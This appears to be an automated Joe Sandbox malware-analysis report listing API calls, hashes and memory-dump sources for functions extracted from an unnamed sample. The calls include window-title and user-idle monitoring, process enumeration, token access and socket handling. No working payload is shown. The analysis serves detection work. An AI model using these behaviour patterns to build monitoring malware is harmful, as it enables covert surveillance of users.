                                                                                                                                                                      • API String ID: 1348767993-1253790388
                                                                                                                                                                      • Opcode ID: e6025bb7ac37f77b8121e8a3c46262e1edab58d1dd10f3b38b6b37a65ab11ce0
                                                                                                                                                                      • Instruction ID: 0810fc811445810694545fcc4d6042d1687a36b6cb98c92983e593a8671dda0e
                                                                                                                                                                      • Opcode Fuzzy Hash: e6025bb7ac37f77b8121e8a3c46262e1edab58d1dd10f3b38b6b37a65ab11ce0
                                                                                                                                                                      • Instruction Fuzzy Hash: CF612EB5E00219AFDB04DFA8D884EAEB7B8FF49310F14466AE915EB345D7349901CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BB21
                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0377BB37
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377BB3D
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377BB66
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0377BB6F
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0377BB83
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                                                                      • String ID: %d min
                                                                                                                                                                      • API String ID: 3754759880-1947832151
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(A0516FA3,00000000,00000000,75BF73E0,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776938
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776947
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776960
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 0377696B
                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037769BE
                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037769CC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,037910DB,000000FF), ref: 03776A2E
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,037910DB,000000FF), ref: 03776A34
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 429299433-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03776DD9
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,03795164,00000000,00020019,75BF73E0), ref: 03776DFC
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03776E4A
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,03795148), ref: 03776E60
                                                                                                                                                                      • lstrcpyW.KERNEL32(037756EA,?), ref: 03776E72
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                      • String ID: GROUP
                                                                                                                                                                      • API String ID: 2102619503-2593425013
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377FA4E
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0377FA5A
                                                                                                                                                                      • __getptd.LIBCMT ref: 0377FA67
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0377F9C4,00000000,00000000,0377E003), ref: 0377FA9E
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,0377E003,00000000,00000000,03775F40,00000000,00000000,00000000), ref: 0377FAA8
                                                                                                                                                                      • _free.LIBCMT ref: 0377FAB1
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0377FABC
                                                                                                                                                                        • Part of subcall function 0377F91B: __getptd_noexit.LIBCMT ref: 0377F91B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C67240
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C6724C
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C67259
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,02C671B6,00000000,?,?), ref: 02C67290
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C6729A
                                                                                                                                                                      • _free.LIBCMT ref: 02C672A3
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 02C672AE
                                                                                                                                                                        • Part of subcall function 02C6710D: __getptd_noexit.LIBCMT ref: 02C6710D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03777523), ref: 0377743D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777444
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 03777452
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 0377745A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      • API String ID: 3433367815-192647395
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377F9CA
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsGetValue.KERNEL32(00000000,03783DF9,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000), ref: 03783CA9
                                                                                                                                                                        • Part of subcall function 03783CA0: DecodePointer.KERNEL32(?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06,0000000D), ref: 03783CBB
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsSetValue.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783CCA
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0377F9D5
                                                                                                                                                                        • Part of subcall function 03783C80: TlsGetValue.KERNEL32(?,?,0377F9DA,00000000), ref: 03783C8E
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0377F9E8
                                                                                                                                                                        • Part of subcall function 03783CD4: DecodePointer.KERNEL32(?,?,?,0377F9ED,00000000,?,00000000), ref: 03783CE5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0377F9F1
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F9F8
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377F9FE
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0377FA1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C671BC
                                                                                                                                                                        • Part of subcall function 02C69754: TlsGetValue.KERNEL32(00000000,02C698AD,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000), ref: 02C6975D
                                                                                                                                                                        • Part of subcall function 02C69754: DecodePointer.KERNEL32(?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA,0000000D), ref: 02C6976F
                                                                                                                                                                        • Part of subcall function 02C69754: TlsSetValue.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C6977E
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C671C7
                                                                                                                                                                        • Part of subcall function 02C69734: TlsGetValue.KERNEL32(?,?,02C671CC,00000000), ref: 02C69742
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C671DA
                                                                                                                                                                        • Part of subcall function 02C69788: DecodePointer.KERNEL32(?,?,?,02C671DF,00000000,?,00000000), ref: 02C69799
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C671E3
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C671EA
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C671F0
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C67210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                      • Opcode ID: 04cee7f23c2e6b5c55e0e74a01a11b299bfa468755313ba5c61f5ce3aff9ff0b
                                                                                                                                                                      • Instruction ID: 7a70c099898340160f26cf85437deef104ca173928c23ae8a151131585a7aa76
                                                                                                                                                                      • Opcode Fuzzy Hash: 04cee7f23c2e6b5c55e0e74a01a11b299bfa468755313ba5c61f5ce3aff9ff0b
                                                                                                                                                                      • Instruction Fuzzy Hash: D2F03074900644ABC704BF71CDCCA7EBBAAEF893587148D59E90987211DB38D44AEFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377607C
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03776088
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 037760B9
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0377610F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03776116
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2526126748-0
                                                                                                                                                                      • Opcode ID: 388b9ba65ec6bc47a5da01a7cb8afcf5094b7d7ee16c67fa854bfa2d829377b6
                                                                                                                                                                      • Instruction ID: 8242cf3445e89389d63d93b969c6c77433a60e832b84e3babe6503df6cc7ff69
                                                                                                                                                                      • Opcode Fuzzy Hash: 388b9ba65ec6bc47a5da01a7cb8afcf5094b7d7ee16c67fa854bfa2d829377b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9021B53160111CABDF20FF64DC99BEAB3A9EF19310F044799DD0A97285EB359A11C660
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C632F1
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 02C632FE
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C63306
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C63312
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6331A
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 02C6332B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                      • Opcode ID: ca8f75170d32847590dfd7b574060c08877c27de45f3996b1c1277ab9a7b2478
                                                                                                                                                                      • Instruction ID: f44daa0004e5b87f278101630010836630985c3538b62a20c260317a278bb909
                                                                                                                                                                      • Opcode Fuzzy Hash: ca8f75170d32847590dfd7b574060c08877c27de45f3996b1c1277ab9a7b2478
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF082726443046BD710ABA9DC84F46F3A8EF85370B204B0DF221872D0CAB0E8058BA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0377669B
                                                                                                                                                                      • CoCreateInstance.OLE32(037946FC,00000000,00000001,0379471C,?,?,?,?,?,?,?,?,?,?,0377588A), ref: 037766B2
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0377674C
                                                                                                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0377588A), ref: 0377677D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                                                                      • String ID: FriendlyName
                                                                                                                                                                      • API String ID: 841178590-3623505368
                                                                                                                                                                      • Opcode ID: ae5d2df0f5960ca19a5901344becab1e914ea51eea5f082251c51b302b269d92
                                                                                                                                                                      • Instruction ID: d549c421b8de3b784cecdde13776b3995c531f31f3584cfaa405a2d73bb72e48
                                                                                                                                                                      • Opcode Fuzzy Hash: ae5d2df0f5960ca19a5901344becab1e914ea51eea5f082251c51b302b269d92
                                                                                                                                                                      • Instruction Fuzzy Hash: 27314C75700609AFDB00EB99DC81EAEB7B9EF88704F148599E504EB255DA71ED02CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                      • String ID: bad allocation
                                                                                                                                                                      • API String ID: 615853336-2104205924
                                                                                                                                                                      • Opcode ID: 07deae21b8db98310831a1c6a66b2e22a16b5e444c41016034b8d87c5b2c596e
                                                                                                                                                                      • Instruction ID: 969ae337cf999c895ce36b495e526b38fe6c0b0de8c008247b2875f1e564b690
                                                                                                                                                                      • Opcode Fuzzy Hash: 07deae21b8db98310831a1c6a66b2e22a16b5e444c41016034b8d87c5b2c596e
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F028759003096FEF00FF64EE29A9E77E8AB40214F94455EE414DA191DB70CA05CF94
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03772D5C
                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 03772D66
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03772D6F
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03772D79
                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 03772D83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                      • Opcode ID: 0a33f683cdfb380a2a6202ea7a25bbd85e88048cbd921c341c773a21686d590f
                                                                                                                                                                      • Instruction ID: ba7bb9720353917c3f59ea06304e6695f3620c74576d7d9a3cb469c513684a35
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a33f683cdfb380a2a6202ea7a25bbd85e88048cbd921c341c773a21686d590f
                                                                                                                                                                      • Instruction Fuzzy Hash: EAF08C76100708BBC224AF54DD09F6677B8FB48B11F104B0DF69696685C6B4B5098BA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C62D3C
                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 02C62D46
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C62D4F
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C62D59
                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 02C62D63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C66F31
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C66F66
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C66F80
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02C66F91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 615853336-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377316B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03773183
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377322F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4033114805-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 037711E9
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03771226
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03771255
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C611E9
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C61226
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C61255
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
